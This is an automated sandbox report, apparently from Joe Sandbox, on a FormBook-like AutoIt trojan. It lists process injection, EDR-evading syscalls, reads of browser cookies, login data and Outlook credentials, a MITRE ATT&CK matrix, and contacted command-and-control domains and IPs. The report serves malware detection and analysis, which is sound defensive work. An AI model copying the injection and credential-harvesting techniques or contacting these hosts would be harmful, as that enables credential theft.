                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtOpenKeyEx: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtQueryValueKey: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe | Thread register set: target process: 5096
                Source: C:\Windows\SysWOW64\tzutil.exe | Thread APC queued: target process: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: C0F008
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_009487B1 LogonUserW
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_008F3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_008F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_00954C27 mouse_event
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\01152-11-12-24.exe"
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_00947CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_0094874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: 01152-11-12-24.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 01152-11-12-24.exe, hKAQraLbCUKXj.exe, 0000000A.00000000.1642689022.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3117377167.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790338575.00000000010E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: hKAQraLbCUKXj.exe, 0000000A.00000000.1642689022.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3117377167.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790338575.00000000010E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: hKAQraLbCUKXj.exe, 0000000A.00000000.1642689022.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3117377167.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790338575.00000000010E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: hKAQraLbCUKXj.exe, 0000000A.00000000.1642689022.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3117377167.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790338575.00000000010E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_0091862B cpuid
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_00924E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_00931E06 GetUserNameW
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_00923F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_008F49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\tzutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: 01152-11-12-24.exe | Binary or memory string: WIN_81
Source: 01152-11-12-24.exe | Binary or memory string: WIN_XP
Source: 01152-11-12-24.exe | Binary or memory string: WIN_XPe
Source: 01152-11-12-24.exe | Binary or memory string: WIN_VISTA
Source: 01152-11-12-24.exe | Binary or memory string: WIN_7
Source: 01152-11-12-24.exe | Binary or memory string: WIN_8
Source: 01152-11-12-24.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_00966283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_00966747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (cells listed per tactic column; the numbers in front of a technique are the badges shown in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 5 Ingress Tool Transfer; 1 Encrypted Channel; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1573117; Sample: 01152-11-12-24.exe; Start date: 11/12/2024; Architecture: WINDOWS; Score: 100

Start node: contacts www.prestigerugz.info, www.ontherise.top and 13 other IPs or domains; signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
• 01152-11-12-24.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
• svchost.exe (started by 01152-11-12-24.exe): Maps a DLL or memory area into another process
• hKAQraLbCUKXj.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
• tzutil.exe (started by hKAQraLbCUKXj.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
• hKAQraLbCUKXj.exe (injected by tzutil.exe): contacts taxitayninh365.site (103.75.185.22, ports 49988, 49989, 49990; VNBOOKING-AS-VNVietNamBookingcorporationVN, Viet Nam), www.prestigerugz.info (217.160.0.113, ports 49859, 49868, 49874; ONEANDONE-ASBrauerstrasse48DE, Germany) and 5 other IPs or domains; Found direct / indirect Syscall (likely to bypass EDR)
• firefox.exe (started by tzutil.exe)

Source | Detection | Scanner | Label
01152-11-12-24.exe | 45% | ReversingLabs | Win32.Trojan.AutoitInject
01152-11-12-24.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://www.75178.club/q34f/ | 0% | Avira URL Cloud | safe
http://www.taxitayninh365.site/syud/ | 0% | Avira URL Cloud | safe
http://www.ontherise.top | 0% | Avira URL Cloud | safe
http://www.prestigerugz.info/m5si/ | 0% | Avira URL Cloud | safe
http://www.44ynh.top/l9wb/ | 100% | Avira URL Cloud | malware
http://www.jijievo.site/521z/ | 0% | Avira URL Cloud | safe
http://www.litespeedtech.com/error-page | 0% | Avira URL Cloud | safe
http://www.ontherise.top/wr6c/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Reputation
44ynh.top | 38.181.21.178 | true | true | unknown
all.wjscdn.com | 154.90.58.209 | true | true | unknown
www.prestigerugz.info | 217.160.0.113 | true | true | unknown
www.supernutra01.online | 104.21.24.198 | true | false | high
taxitayninh365.site | 103.75.185.22 | true | true | unknown
www.ontherise.top | 162.0.213.94 | true | true | unknown
gtml.huksa.huhusddfnsuegcdn.com | 23.167.152.41 | true | false | high
www.nb-shenshi.buzz | 161.97.168.245 | true | false | high
www.75178.club | unknown | unknown | false | unknown
www.setwayidiomas.online | unknown | unknown | false | unknown
www.jijievo.site | unknown | unknown | false | unknown
www.buckser.info | unknown | unknown | false | unknown
www.44ynh.top | unknown | unknown | false | unknown
www.taxitayninh365.site | unknown | unknown | false | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.prestigerugz.info/m5si/ | true | Avira URL Cloud: safe | unknown
http://www.44ynh.top/l9wb/ | true | Avira URL Cloud: malware | unknown
http://www.75178.club/q34f/ | true | Avira URL Cloud: safe | unknown
http://www.ontherise.top/wr6c/ | true | Avira URL Cloud: safe | unknown
http://www.jijievo.site/521z/ | true | Avira URL Cloud: safe | unknown
http://www.taxitayninh365.site/syud/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/chrome_newtab | tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://kb.fastpanel.direct/troubleshoot/ | tzutil.exe, 0000000B.00000002.3118417486.0000000004304000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3120076643.0000000006800000.00000004.00000800.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.0000000002DC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035E34000.00000004.80000000.00040000.00000000.sdmp | false | - | high
http://www.litespeedtech.com/error-page | tzutil.exe, 0000000B.00000002.3118417486.0000000004E02000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.00000000038C2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.ontherise.top | hKAQraLbCUKXj.exe, 0000000C.00000002.3119039119.0000000004E99000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | tzutil.exe, 0000000B.00000002.3118417486.0000000004F94000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.0000000003A54000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.0.213.94 | www.ontherise.top | Canada | 35893 | ACPCA | true
217.160.0.113 | www.prestigerugz.info | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
23.167.152.41 | gtml.huksa.huhusddfnsuegcdn.com | Reserved | 395774 | ESVC-ASNUS | false
103.75.185.22 | taxitayninh365.site | Viet Nam | 63762 | VNBOOKING-AS-VNVietNamBookingcorporationVN | true
154.90.58.209 | all.wjscdn.com | Seychelles | 40065 | CNSERVERSUS | true
38.181.21.178 | 44ynh.top | United States | 174 | COGENT-174US | true
104.21.24.198 | www.supernutra01.online | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1573117
Start date and time: 2024-12-11 15:01:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 01152-11-12-24.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@12/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 49
• Number of non-executed functions: 277
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 01152-11-12-24.exe
                                                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.0.213.94 | DRAFT COPY BL, CI & PL.exe | malicious | FormBook | www.ontherise.top/wr6c/
162.0.213.94 | New Order.exe | malicious | FormBook | www.inspireto.life/odi0/
162.0.213.94 | Price Inquiry.exe | malicious | FormBook | www.oxilo.info/ve3g/
162.0.213.94 | 3qsTcL9MOT.exe | malicious | FormBook | www.oxilo.info/ve3g/
162.0.213.94 | PO #86637.exe | malicious | FormBook | www.syvra.xyz/h2bb/
162.0.213.94 | New Purchase Order.exe | malicious | FormBook | www.kryto.top/09dt/
